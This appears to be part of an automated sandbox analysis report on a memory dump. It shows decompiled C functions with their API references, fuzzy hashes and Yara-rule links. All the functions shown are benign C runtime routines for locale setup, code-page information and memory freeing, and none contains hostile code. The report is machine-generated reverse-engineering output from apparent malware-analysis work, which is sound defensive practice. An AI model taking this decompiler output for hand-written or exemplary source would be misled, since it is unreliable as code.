EnumSystemLocalesW.KERNEL32(00420DEC,00000001,00000006,?,?,00421657,004170A8,?,?,?,?,?,004170A8,?,?,?), ref: 00420ECC

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 6ba66ebe053d03e6bf7145c838a64ccd5cd8c137ae4bafb4b2dc897a0c0654a2
Instruction ID: 952c64e99cf64bfada431f9b15b32c5aa5b0c679350b477496af58bbfa3d0b83
Opcode Fuzzy Hash: 6ba66ebe053d03e6bf7145c838a64ccd5cd8c137ae4bafb4b2dc897a0c0654a2
Instruction Fuzzy Hash: 9BF0553A30020557CB149F36E8056BA7FA4EFC1750B47405EEA098B252C6399883C798

Uniqueness

Uniqueness Score: -1.00%

Function 0041C531, Relevance: 1.3, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041C531() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x439d60 = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}

0x0041c531
0x0041c539
0x0041c541

APIs

GetProcessHeap.KERNEL32 ref: 0041C531

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 0b70db454243609d8e56051eb7fbd2785727d188d9b2fd85955f1d0b559eeae6
Instruction ID: d4707ef4b3ea127157211756d18af540e901d3bdbebde38084d3e2ff7e78ca47
Opcode Fuzzy Hash: 0b70db454243609d8e56051eb7fbd2785727d188d9b2fd85955f1d0b559eeae6
Instruction Fuzzy Hash: CAA02230300200CFA3A08F32FE0E30E3BECBE002C03808038A000C2330EB308820CB08

Uniqueness

Uniqueness Score: -1.00%

Function 00414DC4, Relevance: 22.8, APIs: 15, Instructions: 296
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00414DC4(void* __edx, intOrPtr* _a4) {
				signed int _v8;
				char _v21;
				intOrPtr _v22;
				struct _cpinfo _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				intOrPtr* _v44;
				signed int _v48;
				void* _v52;
				signed int* _v56;
				intOrPtr _v60;
				intOrPtr* _v64;
				signed int* _v68;
				void* _v72;
				char _v76;
				void* __ebx;
				signed int _t101;
				signed int _t104;
				intOrPtr* _t105;
				signed int _t121;
				signed short _t124;
				void* _t128;
				void* _t132;
				void* _t135;
				void* _t136;
				intOrPtr _t137;
				void* _t139;
				signed int _t140;
				intOrPtr* _t141;
				signed char _t158;
				signed char _t163;
				signed int _t164;
				void* _t166;
				signed int _t168;
				intOrPtr _t171;
				void* _t178;
				signed int* _t179;
				signed int* _t180;
				signed int _t181;
				signed char* _t188;
				signed char* _t189;
				void* _t192;
				signed int _t194;
				intOrPtr _t198;
				short* _t210;
				intOrPtr* _t212;
				intOrPtr* _t217;
				signed int _t218;
				signed int _t219;
				void* _t220;
				void* _t221;

				_t101 =  *0x438070; // 0xf2c84916
				_v8 = _t101 ^ _t219;
				_t212 = _a4;
				_t168 = 0;
				_v64 = _t212;
				_v32 = 0;
				_t171 =  *((intOrPtr*)(_t212 + 0xa8));
				_v36 = 0;
				_v40 = 0;
				_v52 = 0;
				_v76 = _t212;
				_v72 = 0;
				if(_t171 == 0) {
					__eflags =  *(_t212 + 0x8c);
					if( *(_t212 + 0x8c) != 0) {
						asm("lock dec dword [eax]");
					}
					 *(_t212 + 0x8c) = _t168;
					_t104 = 0;
					__eflags = 0;
					 *(_t212 + 0x90) = _t168;
					 *_t212 = 0x42be80;
					 *((intOrPtr*)(_t212 + 0x94)) = 0x42c100;
					 *((intOrPtr*)(_t212 + 0x98)) = 0x42c280;
					 *((intOrPtr*)(_t212 + 4)) = 1;
					L41:
					E0040AEA8();
					return _t104;
				}
				_t105 = _t212 + 8;
				_v44 = 0;
				if( *_t105 != 0) {
					L3:
					_v44 = E00414C69(_t171, 1, 4);
					E004155C5(_t168);
					_v32 = E00414C69(_t171, 0x180, 2);
					E004155C5(_t168);
					_v36 = E00414C69(_t171, 0x180, 1);
					E004155C5(_t168);
					_v40 = E00414C69(_t171, 0x180, 1);
					E004155C5(_t168);
					_t198 = E00414C69(_t171, 0x101, 1);
					_v52 = _t198;
					E004155C5(_t168);
					_t221 = _t220 + 0x3c;
					if(_v44 == _t168 || _v32 == _t168 || _t198 == 0 || _v36 == _t168 || _v40 == _t168) {
						L36:
						E004155C5(_v44);
						E004155C5(_v32);
						E004155C5(_v36);
						E004155C5(_v40);
						_t168 = 1;
						__eflags = 1;
						goto L37;
					} else {
						_t121 = _t168;
						do {
							 *(_t121 + _t198) = _t121;
							_t121 = _t121 + 1;
						} while (_t121 < 0x100);
						if(GetCPInfo( *(_t212 + 8),  &_v28) == 0) {
							goto L36;
						}
						_t124 = _v28;
						_t237 = _t124 - 5;
						if(_t124 > 5) {
							goto L36;
						}
						_t28 = _t198 + 1; // 0x1
						_v48 = _t124 & 0x0000ffff;
						_t128 = E0041BB55(_t168, _t237, _t168,  *((intOrPtr*)(_t212 + 0xa8)), 0x100, _t28, 0xff, _v36 + 0x81, 0xff,  *(_t212 + 8), _t168);
						_t221 = _t221 + 0x24;
						_t238 = _t128;
						if(_t128 == 0) {
							goto L36;
						}
						_t34 = _t198 + 1; // 0x1
						_t132 = E0041BB55(_t168, _t238, _t168,  *((intOrPtr*)(_t212 + 0xa8)), 0x200, _t34, 0xff, _v40 + 0x81, 0xff,  *(_t212 + 8), _t168);
						_t221 = _t221 + 0x24;
						if(_t132 == 0) {
							goto L36;
						}
						if(_v48 <= 1 || _v22 == _t168) {
							L22:
							_v60 = _v32 + 0x100;
							_t135 = E0041C7F9(_t244, _t168, 1, _t198, 0x100, _v32 + 0x100,  *(_t212 + 8), _t168);
							_t221 = _t221 + 0x1c;
							if(_t135 == 0) {
								goto L36;
							}
							_t192 = _v32;
							_t136 = _t192 + 0xfe;
							 *_t136 = 0;
							_t178 = _v36;
							_v32 = _t136;
							_t137 = _v40;
							 *(_t178 + 0x7f) = _t168;
							_t179 = _t178 - 0xffffff80;
							 *(_t137 + 0x7f) = _t168;
							_v68 = _t179;
							 *_t179 = _t168;
							_t180 = _t137 + 0x80;
							_v56 = _t180;
							 *_t180 = _t168;
							if(_v48 <= 1 || _v22 == _t168) {
								L32:
								_t181 = 0x3f;
								memcpy(_t192, _t192 + 0x200, _t181 << 2);
								_push(0x1f);
								asm("movsw");
								_t139 = memcpy(_v36, _v36 + 0x100, 0 << 2);
								_push(0x1f);
								asm("movsw");
								asm("movsb");
								_t140 = memcpy(_t139, _t139 + 0x100, 0 << 2);
								asm("movsw");
								asm("movsb");
								_t217 = _v64;
								if( *((intOrPtr*)(_t217 + 0x8c)) != 0) {
									asm("lock xadd [ecx], eax");
									if((_t140 | 0xffffffff) == 0) {
										E004155C5( *(_t217 + 0x90) - 0xfe);
										E004155C5( *(_t217 + 0x94) - 0x80);
										E004155C5( *(_t217 + 0x98) - 0x80);
										E004155C5( *((intOrPtr*)(_t217 + 0x8c)));
									}
								}
								_t141 = _v44;
								 *_t141 = 1;
								 *((intOrPtr*)(_t217 + 0x8c)) = _t141;
								 *_t217 = _v60;
								 *(_t217 + 0x90) = _v32;
								 *(_t217 + 0x94) = _v68;
								 *(_t217 + 0x98) = _v56;
								 *(_t217 + 4) = _v48;
								L37:
								E004155C5(_v52);
								_t104 = _t168;
								goto L41;
							} else {
								_t188 =  &_v21;
								while(1) {
									_t158 =  *_t188;
									if(_t158 == 0) {
										break;
									}
									_t218 =  *(_t188 - 1) & 0x000000ff;
									if(_t218 > (_t158 & 0x000000ff)) {
										L30:
										_t188 =  &(_t188[2]);
										if( *(_t188 - 1) != _t168) {
											continue;
										}
										break;
									}
									_t210 = _t192 + 0x100 + _t218 * 2;
									do {
										_t218 = _t218 + 1;
										 *_t210 = 0x8000;
										_t210 = _t210 + 2;
									} while (_t218 <= ( *_t188 & 0x000000ff));
									goto L30;
								}
								goto L32;
							}
						} else {
							_t189 =  &_v21;
							while(1) {
								_t163 =  *_t189;
								if(_t163 == 0) {
									goto L22;
								}
								_t194 =  *(_t189 - 1) & 0x000000ff;
								_t164 = _t163 & 0x000000ff;
								while(_t194 <= _t164) {
									 *((char*)(_t194 + _t198)) = 0x20;
									_t194 = _t194 + 1;
									__eflags = _t194;
									_t164 =  *_t189 & 0x000000ff;
								}
								_t189 =  &(_t189[2]);
								_t244 =  *(_t189 - 1) - _t168;
								if( *(_t189 - 1) != _t168) {
									continue;
								}
								goto L22;
							}
							goto L22;
						}
					}
				}
				_push(_t105);
				_push(0x1004);
				_push(_t171);
				_push(0);
				_push( &_v76);
				_t166 = E0041C647(__edx);
				_t221 = _t220 + 0x14;
				if(_t166 != 0) {
					goto L36;
				}
				goto L3;
			}

0x00414dcc
0x00414dd3
0x00414dd8
0x00414ddb
0x00414dde
0x00414de1
0x00414de4
0x00414dea
0x00414ded
0x00414df0
0x00414df3
0x00414df6
0x00414dfb
0x0041511b
0x0041511d
0x0041511f
0x0041511f
0x00415122
0x00415128
0x00415128
0x0041512a
0x00415130
0x00415136
0x00415140
0x0041514a
0x00415151
0x00415159
0x00415161
0x00415161
0x00414e01
0x00414e04
0x00414e09
0x00414e27
0x00414e31
0x00414e34
0x00414e47
0x00414e4a
0x00414e58
0x00414e5b
0x00414e69
0x00414e6c
0x00414e7d
0x00414e80
0x00414e83
0x00414e88
0x00414e8e
0x004150e2
0x004150e5
0x004150ed
0x004150f5
0x004150fd
0x00415107
0x00415107
0x00000000
0x00414eb7
0x00414eb7
0x00414eb9
0x00414eb9
0x00414ebc
0x00414ebd
0x00414ed3
0x00000000
0x00000000
0x00414ed9
0x00414edc
0x00414edf
0x00000000
0x00000000
0x00414eec
0x00414eef
0x00414f0f
0x00414f14
0x00414f17
0x00414f19
0x00000000
0x00000000
0x00414f33
0x00414f43
0x00414f48
0x00414f4d
0x00000000
0x00000000
0x00414f57
0x00414f84
0x00414f9a
0x00414f9d
0x00414fa2
0x00414fa7
0x00000000
0x00000000
0x00414fad
0x00414fb2
0x00414fb8
0x00414fbb
0x00414fbe
0x00414fc1
0x00414fc4
0x00414fc7
0x00414fce
0x00414fd1
0x00414fd4
0x00414fd6
0x00414fdc
0x00414fdf
0x00414fe1
0x00415023
0x00415025
0x0041502e
0x00415033
0x00415036
0x00415040
0x00415042
0x00415045
0x00415047
0x00415050
0x00415052
0x00415054
0x00415055
0x00415060
0x00415065
0x00415069
0x00415077
0x0041508a
0x00415098
0x004150a3
0x004150a8
0x00415069
0x004150ab
0x004150ae
0x004150b4
0x004150bd
0x004150c2
0x004150cb
0x004150d4
0x004150dd
0x00415108
0x0041510b
0x00415111
0x00000000
0x00414fe8
0x00414fe8
0x00414feb
0x00414feb
0x00414fef
0x00000000
0x00000000
0x00414ff1
0x00414ffa
0x00415018
0x00415018
0x0041501e
0x00000000
0x00000000
0x00000000
0x0041501e
0x00415002
0x00415005
0x0041500a
0x0041500b
0x0041500e
0x00415014
0x00000000
0x00415005
0x00000000
0x00415020
0x00414f5e
0x00414f5e
0x00414f61
0x00414f61
0x00414f65
0x00000000
0x00000000
0x00414f67
0x00414f6b
0x00414f78
0x00414f70
0x00414f74
0x00414f74
0x00414f75
0x00414f75
0x00414f7c
0x00414f7f
0x00414f82
0x00000000
0x00000000
0x00000000
0x00414f82
0x00000000
0x00414f61
0x00414f57
0x00414e8e
0x00414e0b
0x00414e0c
0x00414e11
0x00414e15
0x00414e16
0x00414e17
0x00414e1c
0x00414e21
0x00000000
0x00000000
0x00000000

APIs

_free.LIBCMT ref: 00414E34
_free.LIBCMT ref: 00414E4A
_free.LIBCMT ref: 00414E5B
_free.LIBCMT ref: 00414E6C
_free.LIBCMT ref: 00414E83
GetCPInfo.KERNEL32(?,?), ref: 00414ECB

Part of subcall function 0041C647: _free.LIBCMT ref: 0041C6B2

_free.LIBCMT ref: 00415077
_free.LIBCMT ref: 0041508A
_free.LIBCMT ref: 00415098
_free.LIBCMT ref: 004150A3
_free.LIBCMT ref: 004150E5
_free.LIBCMT ref: 004150ED
_free.LIBCMT ref: 004150F5
_free.LIBCMT ref: 004150FD
_free.LIBCMT ref: 0041510B

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: d432ab3e1aa290d883fce08fd69bfbbc8302942c5c5e20674fd0345489642fb9
Instruction ID: c7bb5239bb54d773a3e81342bcc84f9e3154db06ba5e4c260a5d66fa68fe5d75
Opcode Fuzzy Hash: d432ab3e1aa290d883fce08fd69bfbbc8302942c5c5e20674fd0345489642fb9
Instruction Fuzzy Hash: CFB18E71900705EEDB119FA9C881BEEBBF9FF88304F14406EF495A7342D779A8818B64

Uniqueness

Uniqueness Score: -1.00%

Function 0042020B, Relevance: 19.6, APIs: 13, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042020B(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x438170) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E004155C5(_t46);
							E0041F564( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E004155C5(_t47);
							E0041FA1E( *((intOrPtr*)(_t74 + 0x88)));
						}
						E004155C5( *((intOrPtr*)(_t74 + 0x7c)));
						E004155C5( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E004155C5( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E004155C5( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E004155C5( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E004155C5( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E0042037E( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x4382e0) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E004155C5(_t31);
							E004155C5( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E004155C5(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E004155C5(_t74);
			}

0x00420213
0x00420217
0x0042021f
0x00420228
0x0042022d
0x00420234
0x0042023c
0x00420244
0x0042024f
0x00420255
0x00420256
0x0042025e
0x00420266
0x00420271
0x00420277
0x0042027b
0x00420286
0x0042028c
0x0042022d
0x0042028d
0x00420295
0x004202a8
0x004202bb
0x004202c9
0x004202d4
0x004202d9
0x004202e2
0x004202ea
0x004202eb
0x004202f1
0x004202f4
0x004202f7
0x004202fe
0x00420300
0x00420304
0x0042030c
0x00420313
0x00420319
0x0042031a
0x0042031a
0x00420321
0x00420323
0x00420328
0x00420330
0x00420335
0x00420336
0x00420336
0x00420339
0x0042033c
0x0042033f
0x00420342
0x00420342
0x00420354

APIs

___free_lconv_mon.LIBCMT ref: 0042024F

Part of subcall function 0041F564: _free.LIBCMT ref: 0041F581
Part of subcall function 0041F564: _free.LIBCMT ref: 0041F593
Part of subcall function 0041F564: _free.LIBCMT ref: 0041F5A5
Part of subcall function 0041F564: _free.LIBCMT ref: 0041F5B7
Part of subcall function 0041F564: _free.LIBCMT ref: 0041F5C9
Part of subcall function 0041F564: _free.LIBCMT ref: 0041F5DB
Part of subcall function 0041F564: _free.LIBCMT ref: 0041F5ED
Part of subcall function 0041F564: _free.LIBCMT ref: 0041F5FF
Part of subcall function 0041F564: _free.LIBCMT ref: 0041F611
Part of subcall function 0041F564: _free.LIBCMT ref: 0041F623
Part of subcall function 0041F564: _free.LIBCMT ref: 0041F635
Part of subcall function 0041F564: _free.LIBCMT ref: 0041F647
Part of subcall function 0041F564: _free.LIBCMT ref: 0041F659

_free.LIBCMT ref: 00420244

Part of subcall function 004155C5: HeapFree.KERNEL32(00000000,00000000,?,0041FCD1,?,00000000,?,00000000,?,0041FF75,?,00000007,?,?,004203A3,?), ref: 004155DB
Part of subcall function 004155C5: GetLastError.KERNEL32(?,?,0041FCD1,?,00000000,?,00000000,?,0041FF75,?,00000007,?,?,004203A3,?,?), ref: 004155ED

_free.LIBCMT ref: 00420266
_free.LIBCMT ref: 0042027B
_free.LIBCMT ref: 00420286
_free.LIBCMT ref: 004202A8
_free.LIBCMT ref: 004202BB
_free.LIBCMT ref: 004202C9
_free.LIBCMT ref: 004202D4
_free.LIBCMT ref: 0042030C
_free.LIBCMT ref: 00420313
_free.LIBCMT ref: 00420330
_free.LIBCMT ref: 00420348

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 76bfdb64082b0f718e8688694b3ff3f08f91a1abf3fed4611b635c35e3b9257d
Instruction ID: 518a1a8d886fd6395f5c918c1a9e33469f235f62d90e1c88cc88d8912530a37c
Opcode Fuzzy Hash: 76bfdb64082b0f718e8688694b3ff3f08f91a1abf3fed4611b635c35e3b9257d
Instruction Fuzzy Hash: 75313D31600715EFEB209AB9E849B97B3EAAF40354F50455FE458D7256DF38ED808A28

Uniqueness

Uniqueness Score: -1.00%

Function 0041F662, Relevance: 18.4, APIs: 12, Instructions: 376
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0041F662(void* __edx, char _a4) {
				void* _v8;
				void* _v12;
				signed int _v16;
				intOrPtr* _v20;
				signed int _v24;
				char _v28;
				signed int _t105;
				signed int _t115;
				signed int _t117;
				signed int _t121;
				signed int _t125;
				signed int _t129;
				signed int _t133;
				signed int _t137;
				signed int _t141;
				signed int _t145;
				signed int _t149;
				signed int _t153;
				signed int _t157;
				signed int _t161;
				signed int _t165;
				signed int _t169;
				signed int _t173;
				signed int _t177;
				signed int _t181;
				signed int _t185;
				signed int _t189;
				char _t195;
				char _t210;
				signed int _t213;
				void* _t224;
				char* _t226;
				signed int _t227;
				signed int _t231;
				signed int _t232;
				intOrPtr _t233;
				void* _t234;
				void* _t236;
				char* _t257;

				_t224 = __edx;
				_t210 = _a4;
				_v16 = 0;
				_v28 = _t210;
				_v24 = 0;
				if( *((intOrPtr*)(_t210 + 0xac)) != 0 ||  *((intOrPtr*)(_t210 + 0xb0)) != 0) {
					_t234 = E00414C69(0, 1, 0x50);
					_v8 = _t234;
					E004155C5(0);
					if(_t234 != 0) {
						_t227 = E00414C69(0, 1, 4);
						_v12 = _t227;
						E004155C5(0);
						if(_t227 != 0) {
							if( *((intOrPtr*)(_t210 + 0xac)) == 0) {
								_t213 = 0x14;
								memcpy(_v8, 0x438170, _t213 << 2);
								L25:
								_t236 = _v8;
								_t231 = _v16;
								 *_t236 =  *( *(_t210 + 0x88));
								 *((intOrPtr*)(_t236 + 4)) =  *((intOrPtr*)( *(_t210 + 0x88) + 4));
								 *((intOrPtr*)(_t236 + 8)) =  *((intOrPtr*)( *(_t210 + 0x88) + 8));
								 *((intOrPtr*)(_t236 + 0x30)) =  *((intOrPtr*)( *(_t210 + 0x88) + 0x30));
								 *((intOrPtr*)(_t236 + 0x34)) =  *((intOrPtr*)( *(_t210 + 0x88) + 0x34));
								 *_v12 = 1;
								if(_t231 != 0) {
									 *_t231 = 1;
								}
								goto L27;
							}
							_t232 = E00414C69(0, 1, 4);
							_v16 = _t232;
							E004155C5(0);
							if(_t232 != 0) {
								_t233 =  *((intOrPtr*)(_t210 + 0xac));
								_t14 = _t234 + 0xc; // 0xc
								_t115 = E0041C647(_t224);
								_t117 = E0041C647(_t224,  &_v28, 1, _t233, 0x14, _v8 + 0x10,  &_v28);
								_t121 = E0041C647(_t224,  &_v28, 1, _t233, 0x16, _v8 + 0x14, 1);
								_t125 = E0041C647(_t224,  &_v28, 1, _t233, 0x17, _v8 + 0x18, _t233);
								_v20 = _v8 + 0x1c;
								_t129 = E0041C647(_t224,  &_v28, 1, _t233, 0x18, _v8 + 0x1c, 0x15);
								_t133 = E0041C647(_t224,  &_v28, 1, _t233, 0x50, _v8 + 0x20, _t14);
								_t137 = E0041C647(_t224);
								_t141 = E0041C647(_t224,  &_v28, 0, _t233, 0x1a, _v8 + 0x28,  &_v28);
								_t145 = E0041C647(_t224,  &_v28, 0, _t233, 0x19, _v8 + 0x29, 1);
								_t149 = E0041C647(_t224,  &_v28, 0, _t233, 0x54, _v8 + 0x2a, _t233);
								_t153 = E0041C647(_t224,  &_v28, 0, _t233, 0x55, _v8 + 0x2b, 0x51);
								_t157 = E0041C647(_t224,  &_v28, 0, _t233, 0x56, _v8 + 0x2c, _v8 + 0x24);
								_t161 = E0041C647(_t224);
								_t165 = E0041C647(_t224,  &_v28, 0, _t233, 0x52, _v8 + 0x2e,  &_v28);
								_t169 = E0041C647(_t224,  &_v28, 0, _t233, 0x53, _v8 + 0x2f, 0);
								_t173 = E0041C647(_t224,  &_v28, 2, _t233, 0x15, _v8 + 0x38, _t233);
								_t177 = E0041C647(_t224,  &_v28, 2, _t233, 0x14, _v8 + 0x3c, 0x57);
								_t181 = E0041C647(_t224,  &_v28, 2, _t233, 0x16, _v8 + 0x40, _v8 + 0x2d);
								_push(_v8 + 0x44);
								_push(0x17);
								_push(_t233);
								_t185 = E0041C647(_t224);
								_t189 = E0041C647(_t224,  &_v28, 2, _t233, 0x50, _v8 + 0x48,  &_v28);
								if((E0041C647(_t224,  &_v28, 2, _t233, 0x51, _v8 + 0x4c, 2) | _t115 | _t117 | _t121 | _t125 | _t129 | _t133 | _t137 | _t141 | _t145 | _t149 | _t153 | _t157 | _t161 | _t165 | _t169 | _t173 | _t177 | _t181 | _t185 | _t189) == 0) {
									_t226 =  *_v20;
									while( *_t226 != 0) {
										_t195 =  *_t226;
										if(_t195 < 0x30 || _t195 > 0x39) {
											if(_t195 != 0x3b) {
												goto L17;
											}
											_t257 = _t226;
											do {
												 *_t257 =  *((intOrPtr*)(_t257 + 1));
												_t257 = _t257 + 1;
											} while ( *_t257 != 0);
										} else {
											 *_t226 = _t195 - 0x30;
											L17:
											_t226 = _t226 + 1;
										}
									}
									goto L25;
								}
								E0041F564(_v8);
								E004155C5(_v8);
								E004155C5(_v12);
								E004155C5(_v16);
								goto L4;
							}
							E004155C5(_t234);
							E004155C5(_v12);
							L7:
							goto L4;
						}
						E004155C5(_t234);
						goto L7;
					}
					L4:
					return 1;
				} else {
					_t231 = 0;
					_v12 = 0;
					_t236 = 0x438170;
					L27:
					_t105 =  *(_t210 + 0x84);
					if(_t105 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t210 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t105 | 0xffffffff) == 0) {
							E004155C5( *(_t210 + 0x88));
							E004155C5( *((intOrPtr*)(_t210 + 0x7c)));
						}
					}
					 *((intOrPtr*)(_t210 + 0x7c)) = _v12;
					 *(_t210 + 0x84) = _t231;
					 *(_t210 + 0x88) = _t236;
					return 0;
				}
			}

0x0041f662
0x0041f66b
0x0041f672
0x0041f675
0x0041f678
0x0041f681
0x0041f6a3
0x0041f6a7
0x0041f6aa
0x0041f6b4
0x0041f6c7
0x0041f6cb
0x0041f6ce
0x0041f6d8
0x0041f6ea
0x0041f980
0x0041f981
0x0041f983
0x0041f98b
0x0041f98f
0x0041f994
0x0041f99f
0x0041f9ab
0x0041f9b7
0x0041f9c3
0x0041f9c9
0x0041f9cd
0x0041f9cf
0x0041f9cf
0x00000000
0x0041f9cd
0x0041f6f9
0x0041f6fd
0x0041f700
0x0041f70a
0x0041f71e
0x0041f724
0x0041f731
0x0041f748
0x0041f75f
0x0041f776
0x0041f786
0x0041f793
0x0041f7aa
0x0041f7c1
0x0041f7d8
0x0041f7f2
0x0041f809
0x0041f820
0x0041f837
0x0041f851
0x0041f868
0x0041f87f
0x0041f896
0x0041f8b0
0x0041f8c7
0x0041f8d4
0x0041f8d5
0x0041f8d7
0x0041f8de
0x0041f8f5
0x0041f919
0x0041f947
0x0041f95a
0x0041f94b
0x0041f94f
0x0041f963
0x00000000
0x00000000
0x0041f965
0x0041f967
0x0041f96a
0x0041f96c
0x0041f96f
0x0041f955
0x0041f957
0x0041f959
0x0041f959
0x0041f959
0x0041f94f
0x00000000
0x0041f95f
0x0041f91f
0x0041f925
0x0041f92e
0x0041f937
0x00000000
0x0041f93c
0x0041f70d
0x0041f716
0x0041f6e0
0x00000000
0x0041f6e0
0x0041f6db
0x00000000
0x0041f6db
0x0041f6b6
0x00000000
0x0041f68b
0x0041f68b
0x0041f68d
0x0041f690
0x0041f9d1
0x0041f9d1
0x0041f9d9
0x0041f9db
0x0041f9db
0x0041f9e3
0x0041f9e8
0x0041f9ec
0x0041f9f4
0x0041f9fc
0x0041fa02
0x0041f9ec
0x0041fa06
0x0041fa0b
0x0041fa11
0x00000000
0x0041fa11

APIs

_free.LIBCMT ref: 0041F6AA
_free.LIBCMT ref: 0041F6CE
_free.LIBCMT ref: 0041F6DB
_free.LIBCMT ref: 0041F700
_free.LIBCMT ref: 0041F70D
_free.LIBCMT ref: 0041F716
_free.LIBCMT ref: 0041F9F4
_free.LIBCMT ref: 0041F9FC

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 29941df1ffa04a7e0cc0e886fe49fb042c5df2575e0f309c68be2d54d78b6bab
Instruction ID: e1b6efb3dfb13fc1cb38915f06380769db44bcc9d5e2a910ad454398cf6ee328
Opcode Fuzzy Hash: 29941df1ffa04a7e0cc0e886fe49fb042c5df2575e0f309c68be2d54d78b6bab
Instruction Fuzzy Hash: B2C125B2D40204BBDB20DBA9CC82FDF77F99F44714F14416AFA04FB282D67999858B54

Uniqueness

Uniqueness Score: -1.00%

Function 00418B7D, Relevance: 15.1, APIs: 10, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418B7D(char _a4) {
				char _v8;

				_t26 = _a4;
				_t52 =  *_a4;
				if( *_a4 != 0x42c390) {
					E004155C5(_t52);
					_t26 = _a4;
				}
				E004155C5( *((intOrPtr*)(_t26 + 0x3c)));
				E004155C5( *((intOrPtr*)(_a4 + 0x30)));
				E004155C5( *((intOrPtr*)(_a4 + 0x34)));
				E004155C5( *((intOrPtr*)(_a4 + 0x38)));
				E004155C5( *((intOrPtr*)(_a4 + 0x28)));
				E004155C5( *((intOrPtr*)(_a4 + 0x2c)));
				E004155C5( *((intOrPtr*)(_a4 + 0x40)));
				E004155C5( *((intOrPtr*)(_a4 + 0x44)));
				E004155C5( *((intOrPtr*)(_a4 + 0x360)));
				_v8 =  &_a4;
				E00418A43(5,  &_v8);
				_v8 =  &_a4;
				return E00418A93(4,  &_v8);
			}

0x00418b83
0x00418b86
0x00418b8e
0x00418b91
0x00418b96
0x00418b99
0x00418b9d
0x00418ba8
0x00418bb3
0x00418bbe
0x00418bc9
0x00418bd4
0x00418bdf
0x00418bea
0x00418bf8
0x00418c00
0x00418c09
0x00418c11
0x00418c25

APIs

_free.LIBCMT ref: 00418B91

Part of subcall function 004155C5: HeapFree.KERNEL32(00000000,00000000,?,0041FCD1,?,00000000,?,00000000,?,0041FF75,?,00000007,?,?,004203A3,?), ref: 004155DB
Part of subcall function 004155C5: GetLastError.KERNEL32(?,?,0041FCD1,?,00000000,?,00000000,?,0041FF75,?,00000007,?,?,004203A3,?,?), ref: 004155ED

_free.LIBCMT ref: 00418B9D
_free.LIBCMT ref: 00418BA8
_free.LIBCMT ref: 00418BB3
_free.LIBCMT ref: 00418BBE
_free.LIBCMT ref: 00418BC9
_free.LIBCMT ref: 00418BD4
_free.LIBCMT ref: 00418BDF
_free.LIBCMT ref: 00418BEA
_free.LIBCMT ref: 00418BF8

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: f948785b3836661600e69e2d55b8090e2648f69a87cc4518a6ba5673093769f0
Instruction ID: e5602d552ef1a297f5513ebaba73d54cdd9c46b8f542baefa34ad5c6fa8cd2d8
Opcode Fuzzy Hash: f948785b3836661600e69e2d55b8090e2648f69a87cc4518a6ba5673093769f0
Instruction Fuzzy Hash: 63119B75500608FFCB01EF95C842DDD3BBAEF44358B5144AAFA084F626DA35DE909F84

Uniqueness

Uniqueness Score: -1.00%

